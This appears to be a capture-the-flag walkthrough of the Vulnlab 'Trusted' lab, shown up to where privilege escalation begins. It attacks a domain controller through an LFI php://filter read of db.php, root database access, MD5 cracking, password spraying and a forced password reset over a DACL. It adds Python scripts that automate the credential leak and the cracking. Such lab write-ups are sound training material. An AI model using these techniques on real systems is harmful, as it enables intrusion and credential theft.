Vulnlab - Trusted (Chain) - Easy

trusted logo

Warning

I did this chain in two sessions, meaning that the IPs changed during the walkthrough. To make it clear:

  • 10.10.182.134 = 10.10.132.102 = labdc.lab.trusted.vl
  • 10.10.182.133 = 10.10.132.101 = trusteddc.trusted.vl

LABDC.LAB.TRUSTED.VL

Initial Access

As always, let’s begin with an nmap scan to discover which services are exposed to us:

$ nmap -sV -sC -p- -A --max-retries 2 -n 10.10.182.134

Starting Nmap 7.93 ( https://nmap.org ) at 2025-01-19 12:17 CET
Nmap scan report for 10.10.182.134
Host is up (0.021s latency).
Not shown: 65506 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
| http-title: Welcome to XAMPP
|_Requested resource was http://10.10.182.134/dashboard/
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-19 11:18:27Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http      Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
| tls-alpn: 
|_  http/1.1
| http-title: Welcome to XAMPP
|_Requested resource was https://10.10.182.134/dashboard/
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3306/tcp  open  mysql         MySQL 5.5.5-10.4.24-MariaDB
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.4.24-MariaDB
|   Thread ID: 10
|   Capabilities flags: 63486
|   Some Capabilities: Support41Auth, IgnoreSigpipes, Speaks41ProtocolOld, SupportsLoadDataLocal, SupportsTransactions, FoundRows, DontAllowDatabaseTableColumn, LongColumnFlag, SupportsCompression, InteractiveClient, ConnectWithDatabase, Speaks41ProtocolNew, ODBCClient, IgnoreSpaceBeforeParenthesis, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: ~AhfJ{OWJJr%\"2tth/L
|_  Auth Plugin Name: mysql_native_password
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-01-19T11:19:40+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=labdc.lab.trusted.vl
| Not valid before: 2025-01-18T11:13:04
|_Not valid after:  2025-07-20T11:13:04
| rdp-ntlm-info: 
|   Target_Name: LAB
|   NetBIOS_Domain_Name: LAB
|   NetBIOS_Computer_Name: LABDC
|   DNS_Domain_Name: lab.trusted.vl
|   DNS_Computer_Name: labdc.lab.trusted.vl
|   DNS_Tree_Name: trusted.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-01-19T11:19:31+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49380/tcp open  msrpc         Microsoft Windows RPC
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49687/tcp open  msrpc         Microsoft Windows RPC
62354/tcp open  msrpc         Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=1/19%OT=53%CT=1%CU=39030%PV=Y%DS=2%DC=T%G=Y%TM=678CDFC
OS:E%P=aarch64-unknown-linux-gnu)SEQ(SP=108%GCD=1%ISR=106%TI=I%CI=I%II=I%SS
OS:=S%TS=A)OPS(O1=M4D4NW8ST11%O2=M4D4NW8ST11%O3=M4D4NW8NNT11%O4=M4D4NW8ST11
OS:%O5=M4D4NW8ST11%O6=M4D4ST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%
OS:W6=FFDC)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M4D4NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S
OS:=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y
OS:%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%
OS:O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=8
OS:0%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%
OS:Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=
OS:Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: LABDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-01-19T11:19:34
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required

TRACEROUTE (using port 199/tcp)
HOP RTT      ADDRESS
1   21.46 ms 10.8.0.1
2   21.72 ms 10.10.182.134

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.61 seconds


There are a lot of interesting services here. The first thing to notice is that we are facing a domain controller: DNS (53), Kerberos (88), LDAP and the global catalog (389/636, 3268/3269) are all open, and the rdp-ntlm-info script already gives us the domain name lab.trusted.vl and the DNS tree name trusted.vl, hinting at a second domain. Let’s start with the service most commonly found during an assessment, HTTP. Opening the website in a browser (ports 80 and 443 serve the same content), we see that XAMPP is running:

XAMPP homepage
Figure 1: XAMPP homepage


Let’s do a little bit of fuzzing with Feroxbuster (did I already tell you it’s my favorite content discovery tool?):

$ ./feroxbuster -u https://10.10.182.134 -x html php md txt --insecure
                                                                                                                                                         
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ https://10.10.182.134
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)         7
 🦡  User-Agent            │ feroxbuster/2.11.0
 🔎  Extract Links         │ true
 💲  Extensions            │ [html, php, md, txt]
 🏁  HTTP methods          │ [GET]
 🔓  Insecure              │ true
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       30w      303c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       33w      300c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
302      GET        0l        0w        0c https://10.10.182.134/ => https://10.10.182.134/dashboard/
301      GET        9l       30w      338c https://10.10.182.134/img => https://10.10.182.134/img/
200      GET        5l        9w      694c https://10.10.182.134/img/module_table_top.png
200      GET        3l       16w     1549c https://10.10.182.134/img/module_table_bottom.png
301      GET        9l       30w      338c https://10.10.182.134/dev => https://10.10.182.134/dev/
301      GET        9l       30w      345c https://10.10.182.134/dev/images => https://10.10.182.134/dev/images/
301      GET        9l       30w      342c https://10.10.182.134/dev/css => https://10.10.182.134/dev/css/
200      GET       30l      162w    11333c https://10.10.182.134/dev/images/smile.jpg
200      GET        7l       79w     5370c https://10.10.182.134/dev/images/icons.png
200      GET       49l      133w     4060c https://10.10.182.134/dev/images/bg-footnote.jpg
200      GET       46l      296w    21946c https://10.10.182.134/dev/images/bride.jpg
200      GET      612l     1583w    11331c https://10.10.182.134/dev/css/style.css
200      GET        5l       44w     1353c https://10.10.182.134/dev/images/bg-header.jpg
200      GET       68l      415w    34142c https://10.10.182.134/dev/images/children.jpg
200      GET       15l       97w     6647c https://10.10.182.134/dev/images/thumbnail-focus.jpg
200      GET       31l      195w    17155c https://10.10.182.134/dev/images/logo.png
200      GET       34l      342w    17551c https://10.10.182.134/dev/images/frames.png
200      GET       80l      208w     2311c https://10.10.182.134/dev/index.html
200      GET       75l      156w     1967c https://10.10.182.134/dev/contact.html
200      GET       72l      397w    29702c https://10.10.182.134/dev/images/happy.jpg
200      GET      131l      991w    62256c https://10.10.182.134/dev/images/thumb-up.jpg
200      GET       27l      156w    11991c https://10.10.182.134/dev/images/handshake.jpg
200      GET      315l     1842w   149229c https://10.10.182.134/dev/images/family.png
200      GET       56l      262w    21931c https://10.10.182.134/dev/images/divorce.jpg
200      GET       58l      382w    37111c https://10.10.182.134/dev/images/prenuptial.jpg
302      GET        0l        0w        0c https://10.10.182.134/index.php => https://10.10.182.134/dashboard/
200      GET      323l      924w    79670c https://10.10.182.134/dev/images/family-large.jpg
200      GET       37l      173w    10393c https://10.10.182.134/dev/images/bride-sideview.jpg
200      GET       24l      156w    11896c https://10.10.182.134/dev/images/family-small.jpg
200      GET       14l      105w     7671c https://10.10.182.134/dev/images/thumbnail-smile.jpg
200      GET      109l      603w    50334c https://10.10.182.134/dev/images/laughing.jpg
200      GET       35l      209w    17125c https://10.10.182.134/dev/images/meeting.jpg
200      GET        6l       56w     3225c https://10.10.182.134/dev/images/bg-footer.png
200      GET        8l       91w     5615c https://10.10.182.134/dev/images/thumbnail-frontview.jpg
200      GET       16l       93w     6429c https://10.10.182.134/dev/images/thumbnail-sideview.jpg
200      GET       11l      103w     5860c https://10.10.182.134/dev/images/thumbnail-happy.jpg
200      GET        6l      108w     4672c https://10.10.182.134/dev/images/interface.png
200      GET        3l       41w     1019c https://10.10.182.134/dev/images/border.png
200      GET        1l        2w       22c https://10.10.182.134/dev/db.php
200      GET       65l      460w    43646c https://10.10.182.134/dev/images/bg-adbox.png
301      GET        9l       30w      345c https://10.10.182.134/dev/Images => https://10.10.182.134/dev/Images/
200      GET        6l       56w     3225c https://10.10.182.134/dev/Images/bg-footer.png
200      GET       56l      262w    21931c https://10.10.182.134/dev/Images/divorce.jpg
200      GET        7l       79w     5370c https://10.10.182.134/dev/Images/icons.png
200      GET        3l       41w     1019c https://10.10.182.134/dev/Images/border.png
200      GET       24l      156w    11896c https://10.10.182.134/dev/Images/family-small.jpg
200      GET        6l      108w     4672c https://10.10.182.134/dev/Images/interface.png
200      GET       37l      173w    10393c https://10.10.182.134/dev/Images/bride-sideview.jpg
200      GET       11l      103w     5860c https://10.10.182.134/dev/Images/thumbnail-happy.jpg
200      GET       16l       93w     6429c https://10.10.182.134/dev/Images/thumbnail-sideview.jpg
200      GET       30l      162w    11333c https://10.10.182.134/dev/Images/smile.jpg
200      GET       15l       97w     6647c https://10.10.182.134/dev/Images/thumbnail-focus.jpg
200      GET       31l      195w    17155c https://10.10.182.134/dev/Images/logo.png
200      GET       27l      156w    11991c https://10.10.182.134/dev/Images/handshake.jpg
200      GET       14l      105w     7671c https://10.10.182.134/dev/Images/thumbnail-smile.jpg
200      GET       49l      133w     4060c https://10.10.182.134/dev/Images/bg-footnote.jpg
200      GET        8l       91w     5615c https://10.10.182.134/dev/Images/thumbnail-frontview.jpg
200      GET        5l       44w     1353c https://10.10.182.134/dev/Images/bg-header.jpg
200      GET       58l      382w    37111c https://10.10.182.134/dev/Images/prenuptial.jpg
200      GET       41l       94w     1177c https://10.10.182.134/dev/about.html
200      GET       46l      296w    21946c https://10.10.182.134/dev/Images/bride.jpg
200      GET       34l      342w    17551c https://10.10.182.134/dev/Images/frames.png
200      GET       68l      415w    34142c https://10.10.182.134/dev/Images/children.jpg
200      GET       35l      209w    17125c https://10.10.182.134/dev/Images/meeting.jpg
200      GET       72l      397w    29702c https://10.10.182.134/dev/Images/happy.jpg
200      GET      131l      991w    62256c https://10.10.182.134/dev/Images/thumb-up.jpg
200      GET       65l      460w    43646c https://10.10.182.134/dev/Images/bg-adbox.png
200      GET      109l      603w    50334c https://10.10.182.134/dev/Images/laughing.jpg
200      GET      323l      924w    79670c https://10.10.182.134/dev/Images/family-large.jpg
200      GET      315l     1842w   149229c https://10.10.182.134/dev/Images/family.png
301      GET        9l       30w      342c https://10.10.182.134/dev/CSS => https://10.10.182.134/dev/CSS/
200      GET      612l     1583w    11331c https://10.10.182.134/dev/CSS/style.css
301      GET        9l       30w      344c https://10.10.182.134/dashboard => https://10.10.182.134/dashboard/
200      GET        8l       76w     4088c https://10.10.182.134/dashboard/images/fastly-logo@2x.png
200      GET      167l      649w     7576c https://10.10.182.134/dashboard/index.html
200      GET       79l      250w     3607c https://10.10.182.134/applications.html
200      GET        7l       57w     2442c https://10.10.182.134/dashboard/images/fastly-logo.png
200      GET       17l       21w      177c https://10.10.182.134/bitnami.css
200      GET      131l      390w     6021c https://10.10.182.134/dashboard/howto.html
301      GET        9l       30w      351c https://10.10.182.134/dashboard/images => https://10.10.182.134/dashboard/images/
301      GET        9l       30w      347c https://10.10.182.134/dashboard/de => https://10.10.182.134/dashboard/de/
301      GET        9l       30w      347c https://10.10.182.134/dashboard/fr => https://10.10.182.134/dashboard/fr/
301      GET        9l       30w      347c https://10.10.182.134/dashboard/it => https://10.10.182.134/dashboard/it/
301      GET        9l       30w      347c https://10.10.182.134/dashboard/ru => https://10.10.182.134/dashboard/ru/
200      GET      523l     3762w    31751c https://10.10.182.134/dashboard/faq.html
200      GET      916l     4881w    81049c https://10.10.182.134/dashboard/phpinfo.php
503      GET       11l       44w      403c https://10.10.182.134/examples
301      GET        9l       30w      347c https://10.10.182.134/dashboard/ro => https://10.10.182.134/dashboard/ro/
301      GET        9l       30w      342c https://10.10.182.134/dev/Css => https://10.10.182.134/dev/Css/
200      GET       16l      155w    10943c https://10.10.182.134/dashboard/images/sourceforge-logo.png
200      GET       15l       93w     6731c https://10.10.182.134/dashboard/images/pdf-icon.png
200      GET        5l       47w     2036c https://10.10.182.134/dashboard/images/apple-logo.png
200      GET       40l      202w    14635c https://10.10.182.134/dashboard/images/xampp-newsletter-logo.png
200      GET       85l      555w    39860c https://10.10.182.134/dashboard/images/bitnami-xampp.png
200      GET       54l      286w    26141c https://10.10.182.134/dashboard/images/xampp-cloud.png
200      GET      145l      689w    57729c https://10.10.182.134/dashboard/images/stack-icons@2x.png
200      GET      117l      672w    61339c https://10.10.182.134/dashboard/images/xampp-cloud@2x.png
200      GET       27l      253w    19113c https://10.10.182.134/dashboard/images/sourceforge-logo@2x.png
200      GET     9147l    36448w   481698c https://10.10.182.134/dashboard/stylesheets/all.css
200      GET      385l     1620w   180620c https://10.10.182.134/dashboard/images/screenshots/xampp-macosx-run-installer.jpg
200      GET      192l      819w   111554c https://10.10.182.134/dashboard/images/screenshots/xampp-macosx-launch-credentials.jpg
200      GET      190l      939w   149693c https://10.10.182.134/dashboard/images/screenshots/xampp-macosx-stack-manager-services.jpg
200      GET      198l      879w   148586c https://10.10.182.134/dashboard/images/screenshots/xampp-macosx-stack-manager.jpg
200      GET      167l      656w     7702c https://10.10.182.134/dashboard/it/index.html
200      GET      523l     3892w    34144c https://10.10.182.134/dashboard/it/faq.html
200      GET     1071l     7077w   888496c https://10.10.182.134/dashboard/images/screenshots/xampp-linux-start.jpg
301      GET        9l       30w      345c https://10.10.182.134/dev/IMAGES => https://10.10.182.134/dev/IMAGES/
301      GET        9l       30w      347c https://10.10.182.134/dashboard/ES => https://10.10.182.134/dashboard/ES/
200      GET      167l      665w     7776c https://10.10.182.134/dashboard/ro/index.html
200      GET      523l     3739w    34016c https://10.10.182.134/dashboard/ro/FAQ.html
200      GET      131l      390w     6084c https://10.10.182.134/dashboard/ru/howto.html
403      GET       11l       47w      422c https://10.10.182.134/server-status
301      GET        9l       30w      356c https://10.10.182.134/dashboard/JavaScripts => https://10.10.182.134/dashboard/JavaScripts/
Feroxbuster arguments
  • -u : the target URL to fuzz

  • -x : extensions to append to each word of the wordlist

  • --insecure : skip TLS certificate verification, needed here because the server presents an expired certificate issued for localhost


We found a directory called dev, which is not part of a stock XAMPP install. Let’s take a look:

dev homepage
Figure 2: dev homepage


There is one really useful piece of information here: someone asked Eric to check whether the database connection is working. We found a file called db.php during the fuzzing, so keep it in mind.
If you click on the HOME link, a GET parameter appears in the URL:

dev GET parameter
Figure 3: GET parameter on the dev homepage


When I see a GET parameter that selects a page, I immediately test it for LFI (Local File Inclusion), and that’s the case here:

LFI payload
Figure 4: LFI payload


Remember db.php. Since we have an LFI we can include this file, but a plain include executes the PHP server-side and the browser only gets the output, not the source (and db.php outputs almost nothing: 22 bytes in the feroxbuster results).
PHP’s php://filter wrapper solves this: applying the convert.base64-encode filter to the resource makes PHP return the raw file, base64-encoded, instead of executing it:

Encoding content of DB.php
Figure 5: Encoding content of DB.php


The next step is to decode this base64 string; you can do it directly in Burp (Decoder) or on the CLI (base64 -d), as you prefer:

Credentials to access the DB
Figure 6: Credentials to access the DB
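The php://filter read described above, scripted as an added example (this is not code from the original write-up). It builds the payload URL, pulls the base64 blob out of the HTML the page returns and parses the usual `$var = '...'` / `define(...)` forms out of the leaked source. The parameter name `page`, the base URL and the sample db.php content are assumptions made up for the demo; substitute the real parameter you saw in Figure 3.

```python
"""
Added example (not part of the original write-up): the php://filter trick
scripted. The parameter name ``page``, the base URL and the sample source
below are ASSUMPTIONS for illustration, not values taken from the lab.
"""
import base64
import re
from urllib.parse import urlencode


def build_filter_payload(base_url: str, param: str, resource: str) -> str:
    """Build the LFI URL that returns the *source* of `resource` base64-encoded.

    A plain include would execute db.php and print nothing useful; the
    convert.base64-encode filter makes PHP hand back the raw file instead.
    """
    wrapper = f"php://filter/convert.base64-encode/resource={resource}"
    return f"{base_url}?{urlencode({param: wrapper})}"


# The leaked source comes back as one long base64 run embedded in the page HTML.
_B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def extract_leaked_source(html: str) -> str:
    """Pull the longest base64 run out of the response body and decode it."""
    runs = _B64_RUN.findall(html)
    if not runs:
        raise ValueError("no base64 blob found in response")
    blob = max(runs, key=len)
    # Re-pad in case the page trimmed trailing '=' characters.
    return base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("utf-8", "replace")


# Matches the common `$var = 'value';` and `define('NAME', 'value');` forms.
_ASSIGN = re.compile(r"\$(\w+)\s*=\s*['\"]([^'\"]*)['\"]")
_DEFINE = re.compile(r"define\(\s*['\"](\w+)['\"]\s*,\s*['\"]([^'\"]*)['\"]\s*\)")


def parse_credentials(php_source: str) -> dict:
    """Collect string assignments and defines from a leaked PHP config file."""
    found = {}
    for rx in (_ASSIGN, _DEFINE):
        for name, value in rx.findall(php_source):
            found[name] = value
    return found


if __name__ == "__main__":
    # Constructed sample of what a db.php-style include might leak; these are
    # made-up demo values, not the lab's real credentials.
    fake_source = "<?php\n$host = 'localhost';\n$user = 'root';\n$pass = 'example';\n"
    fake_html = "<html><body>" + base64.b64encode(fake_source.encode()).decode() + "</body></html>"
    # Assumed URL and parameter name; replace with the real ones from the dev site.
    print(build_filter_payload("https://10.10.182.134/dev/index.php", "page", "db.php"))
    print(parse_credentials(extract_leaked_source(fake_html)))
```

Fetch the printed URL with curl -k (the certificate is expired, like feroxbuster’s --insecure) and feed the body to extract_leaked_source; the same wrapper works for any readable file the web server user can open, which on XAMPP on a DC is usually SYSTEM.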


With the credentials in hand, we can try to connect to the database remotely; if you remember, a MySQL (MariaDB) service is listening on port 3306, and it accepts the root account from the network:

$ mysql -u root -p -h 10.10.182.134
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 32
Server version: 10.4.24-MariaDB mariadb.org binary distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>


After a bit of enumeration (show databases;), I found a database called news containing a users table with three users:

MariaDB [phpmyadmin]> use news;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [news]> show tables;
+----------------+
| Tables_in_news |
+----------------+
| users          |
+----------------+
1 row in set (0.028 sec)

MariaDB [news]> select * from users;
+----+------------+--------------+-----------+----------------------------------+
| id | first_name | short_handle | last_name | password                         |
+----+------------+--------------+-----------+----------------------------------+
|  1 | Robert     | rsmith       | Smith     | 7e7abb54bb<REDACTED> |
|  2 | Eric       | ewalters     | Walters   | d6e81aeb4d<REDACTED> |
|  3 | Christine  | cpowers      | Powers    | e3d3eb0f46<REDACTED> |
+----+------------+--------------+-----------+----------------------------------+
3 rows in set (0.027 sec)


A good habit is to keep a file of the users and credentials you find during an assessment; it is useful later for password spraying.
The password column holds 32 hex characters with no salt, which looks like raw MD5 (hashcat mode 0), so let’s try to crack these hashes with hashcat:

$ hashcat --hash-type 0 --attack-mode 0 hashes `fzf-wordlists`      
hashcat (v6.2.6) starting

Dictionary cache built:
* Filename..: /opt/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 1 sec

7e7abb54bb<REDACTED>:<REDACTED>               
Approaching final keyspace - workload adjusted.           

                                                          
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 0 (MD5)
Hash.Target......: hashes
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/opt/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  6708.5 kH/s (0.05ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/3 (33.33%) Digests (total), 1/3 (33.33%) Digests (new)
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 0/14344384 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b6d3831303838] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 46%
Hashcat arguments
  • --hash-type : specifies the hash algorithm (0 is MD5)

  • --attack-mode : specifies a straight (dictionary) attack (0); the backtick-expanded fzf-wordlists is a helper that interactively picks the wordlist, here /opt/rockyou.txt
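
To show why these hashes fall in one second and what the application should have stored instead, here is an added example (not from the original post): a minimal straight/rule dictionary attack against unsalted MD5 next to a salted, iterated PBKDF2 scheme. The digests and wordlist are constructed for the demo (well-known MD5 values of "password", "123456" and "hello" plus an all-zero placeholder); the lab’s real hashes are not used.

```python
"""
Added example (not from the original post): why unsalted MD5 falls to
hashcat mode 0 instantly, and the salted/iterated alternative. All hashes
and words below are CONSTRUCTED demo data.
"""
import hashlib
import hmac
import os
import re

HEX32 = re.compile(r"^[0-9a-f]{32}$")


def looks_like_unsalted_md5(h: str) -> bool:
    """32 hex chars with no salt or prefix is the signature of raw MD5 (hashcat -m 0)."""
    return bool(HEX32.match(h.lower()))


def candidates(word: str):
    """Straight attack plus a few cheap mangling rules (like hashcat -a 0 with -r)."""
    yield word
    yield word.capitalize()
    for suffix in ("1", "123", "!"):
        yield word + suffix


def crack_md5(targets, wordlist, use_rules=False):
    """Return {hash: plaintext} for every target found in the wordlist."""
    wanted = {t.lower() for t in targets if looks_like_unsalted_md5(t)}
    cracked = {}
    for word in wordlist:
        for cand in (candidates(word) if use_rules else (word,)):
            # One MD5 per guess: no salt, so identical passwords share a digest
            # and one table lookup cracks every user who chose that password.
            digest = hashlib.md5(cand.encode()).hexdigest()
            if digest in wanted:
                cracked[digest] = cand
                wanted.discard(digest)
        if not wanted:
            break
    return cracked


# --- what the application should have stored instead -----------------------
ITERATIONS = 600_000  # PBKDF2-HMAC-SHA256 work factor; each guess now costs ~0.3 s


def hash_password(password: str) -> str:
    """Per-user random salt + iterated KDF, stored in a self-describing string."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(stored: str, password: str) -> bool:
    _, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)  # constant-time comparison


# Constructed demo data: well-known MD5 digests of "password", "123456", "hello"
# and one all-zero placeholder that no candidate will produce.
DEMO_HASHES = [
    "5f4dcc3b5aa765d61d8327deb882cf99",
    "e10adc3949ba59abbe56e057f20f883e",
    "5d41402abc4b2a76b9719d911017c592",
    "00000000000000000000000000000000",
]
DEMO_WORDLIST = ["letmein", "hello", "password", "123456", "qwerty"]

if __name__ == "__main__":
    print(crack_md5(DEMO_HASHES, DEMO_WORDLIST))
    stored = hash_password("hello")
    print(verify_password(stored, "hello"), verify_password(stored, "hell0"))
```

The uncracked placeholder stays uncracked even with rules, which mirrors the two lab hashes rockyou did not cover: a straight run exhausting the keyspace is the signal to either add rules or move on to spraying what you already have, as the write-up does next.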


We were able to crack only one of the three hashes. Let’s do a little password spraying with NetExec, using a users file containing the three short_handle values from the database, to see which user can authenticate with this password:

$ nxc smb 10.10.182.134 -u users -p '<REDACTED>'
SMB         10.10.182.134   445    LABDC            [*] Windows Server 2022 Build 20348 x64 (name:LABDC) (domain:lab.trusted.vl) (signing:True) (SMBv1:False)
SMB         10.10.182.134   445    LABDC            [+] lab.trusted.vl\rsmith:<REDACTED>

Lateral Movement

We now have valid credentials for the domain lab.trusted.vl. What I like to do at this point is collect the domain objects to enumerate DACLs, and for that I use RustHound:

$ rusthound -d 'lab.trusted.vl' -u 'rsmith@lab.trusted.vl' -p '<REDACTED>' -i 10.10.182.134 -z -o . 
---------------------------------------------------
Initializing RustHound at 14:38:08 on 01/19/25
Powered by g0h4n from OpenCyber
---------------------------------------------------

[2025-01-19T13:38:08Z INFO  rusthound] Verbosity level: Info
[2025-01-19T13:38:08Z INFO  rusthound::ldap] Connected to LAB.TRUSTED.VL Active Directory!
[2025-01-19T13:38:08Z INFO  rusthound::ldap] Starting data collection...
[2025-01-19T13:38:08Z INFO  rusthound::ldap] All data collected for NamingContext DC=lab,DC=trusted,DC=vl
[2025-01-19T13:38:08Z INFO  rusthound::json::parser] Starting the LDAP objects parsing...
[2025-01-19T13:38:08Z INFO  rusthound::json::parser::bh_41] MachineAccountQuota: 10
[2025-01-19T13:38:08Z INFO  rusthound::json::parser] Parsing LDAP objects finished!
[2025-01-19T13:38:08Z INFO  rusthound::json::checker] Starting checker to replace some values...
[2025-01-19T13:38:08Z INFO  rusthound::json::checker] Checking and replacing some values finished!
[2025-01-19T13:38:08Z INFO  rusthound::json::maker] 8 users parsed!
[2025-01-19T13:38:08Z INFO  rusthound::json::maker] 55 groups parsed!
[2025-01-19T13:38:08Z INFO  rusthound::json::maker] 1 computers parsed!
[2025-01-19T13:38:08Z INFO  rusthound::json::maker] 5 ous parsed!
[2025-01-19T13:38:08Z INFO  rusthound::json::maker] 1 domains parsed!
[2025-01-19T13:38:08Z INFO  rusthound::json::maker] 2 gpos parsed!
[2025-01-19T13:38:08Z INFO  rusthound::json::maker] 21 containers parsed!
[2025-01-19T13:38:08Z INFO  rusthound::json::maker] ./20250119143808_lab-trusted-vl_rusthound.zip created!

RustHound Enumeration Completed at 14:38:08 on 01/19/25! Happy Graphing!
Rusthound arguments
  • -d : the domain to collect

  • -u : the user used to bind to LDAP

  • -p : that user’s password

  • -z : pack all the generated .json files into one zip, ready to drop into BloodHound

  • -o : the output directory


In BloodHound, looking at the outbound object control of rsmith@lab.trusted.vl, we see he has ForceChangePassword over ewalters@lab.trusted.vl, meaning rsmith can reset ewalters’s password without knowing the current one.

DACLs in bloodhound
Figure 7: DACLs in bloodhound


To abuse this DACL, we use the net command from the samba package (keep in mind that this resets the user’s password, which is disruptive on a real engagement; get the client’s agreement before doing it):

 $ net rpc password 'ewalters' 'TakeALookAtExegol123!' -U 'lab.trusted.vl'/'rsmith'%'<REDACTED>' -S 10.10.182.134


We now control ewalters. Back in BloodHound, ewalters@lab.trusted.vl is a member of the Remote Management Users group, which grants WinRM access to the machine:

Group membership of ewalters
Figure 8: Group membership of ewalters

Privilege Escalation

Once connected through WinRM with Evil-WinRM, we see a directory called AVTest containing two files.
The first one is a readme.txt:

*Evil-WinRM* PS C:\AVTest> type "C:/AVTest/readme.txt"
Since none of the AV Tools we tried here in the lab satisfied our needs it's time to clean them up.
I asked Christine to run them a few times, just to be sure.

Let's just hope we don't have to set this lab up again because of this.


The message says that Christine has to run the program a few times “just to be sure”. Maybe there is a scheduled task running the program on her behalf?
The other file in this directory is an executable, KasperskyRemovalTool.exe.


